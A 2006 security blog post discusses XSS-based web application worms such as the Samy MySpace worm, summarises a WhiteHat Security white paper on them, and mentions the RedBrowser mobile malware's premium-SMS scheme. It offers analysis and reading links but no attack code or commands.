Remeber the most recent Yahoo! Mail's XSS vulnerabilities, or the MySpace worm? I just read through a well written summary on Web Application Worms by Jeremiah Grossman, from WhiteHat Security, "Cross-Site Scripting Worms and Viruses - The Impending Threat and the Best Defense", an excerpt :
"Samy, the author of the worm, was on a mission to be famous, and as such the payload was relatively benign. But consider what he might have done with control of over one million Web browsers and the gigabits of bandwidth at their disposal--browsers that were also potentially logged-in to Google, Yahoo, Microsoft Passport, eBay, web banks, stock brokerages, blogs, message boards, or any other web-based applications. It’s critical that we begin to understand the magnitude of the risk associated with XSS malware and the ways that companies can defend themselves and their users. Especially when the malware originates from trusted websites and aggressive authors. In this white paper we will provide an overview of XSS; define XSS worms; and examine propagation methods, infection rates, and potential impact. Most importantly, we will outline immediate steps enterprises can take to defend their websites."
It provides an overview of Cross-Site Scripting (XSS), Methods of Propagation, comments on the First XSS Worm, a worst case scenario, and of course protection methods, nice graphs and overview of this emerging trend. In my "Future Trends of Malware" research I indeed pointed out on its emergence :
"How would a malware author be able to harness the power of the trust established between, let’s say, ComScore’s top 10 sites and their visitors? Content spoofing is the where the danger comes from in my opinion, and obvious web application vulnerabilities, or any bugs whose malicious payload could be exposed to their audiences. In case you reckon, a nasty content spoofing on Yahoo!’s portal resulted in the following possibility for driving millions of people at a certain URL, if I don’t trust what I see on Yahoo.com or Google.com, why bother using the Net at all is a common mass attitude of course. Any web property attracting a relatively large number of visitors should be considered as a propagation vector, for both, malware authors, and others such as phishers, or botnet brokers for instance."
Monetizing mobile malware is among the other trends I also indicated, and the RedBrowser seems to be the most recent example of this as it randomly chooses a premium-rate number from the following list, and sends a SMS message generating revenue for the attacker : 08293538938, 08001738938, 08180238938, 08229238938, 08441238938, 08287038938, 08187938938, 08189038938, 08217838938, 08446838938.
I summarized the key points back than as :
"The number and penetration of mobile devices greatly outpaces that of the PCs. Malware authors are actively experimenting and of course, progressing with their research on mobile malware. The growing monetization of mobile devices, that is generating revenues out of users and their veto power on certain occasions, would result in more development in this area by malicious authors. SPIM would also emerge with authors adapting their malware for gathering numbers. Mobile malware is also starting to carry malicious payload. Building awareness on the the issue, given the research already done by several vendors, would be a wise idea."
Among the first folks to discuss the topic of web application malware was Robert from CGISecurity.com in his "Anatomy of Web Application Worm" paper back in 2002, and with the easy and speed of discovering web application vulnerabilities in major portals it's up to the imagination of the attacker -- as the paper points out Samy only wanted to make 1 million friends, what if he wanted to do something else?
"Cross-Site Scripting Worms and Viruses - The Impending Threat and the Best Defense" also argues on Samy being the fastest worm, though single-packet UDP worms, according to a research on the "Top Speed of Flash Worm" by "Simulating a flash version of Slammer, calibrated by current Internet latency measurements and observed worm packet delivery rates, we show that a worm could saturate 95% of one million vulnerable hosts on the Internet in 510 milliseconds. A similar worm using a TCP based service could 95% saturate in 1.3 seconds. The speeds above are achieved with flat infection trees and packets sent at line" rates.
Is it the speed or the size of the infected targeted group that matters, and what if Web 2.0 worms can achieve exactly the two of these?
More resources on the topic in case you are interested :
Web-based Malware & Honeypots - phpBB bots/worms
New MySpace XSS worm circulating
Description of a Yahoo! Mail XSS vulnerability
Evolution of Web-based worms
The Latest in Internet Attacks: Web Application Worms
Web Application Worms : Myth or Reality?
Analysis of Web Application Worms and Viruses
Paros - for web application security assessment
Thursday, May 04, 2006
The Current State of Web Application Worms
Independent Security Consultancy, Threat Intelligence Analysis (OSINT/Cyber Counter Intelligence) and Competitive Intelligence research on demand. Insightful, unbiased, and client-tailored assessments, neatly communicated in the form of interactive reports - because anticipating the emerging threatscape is what shapes the big picture at the end of the day. Approach me at dancho.danchev@hush.com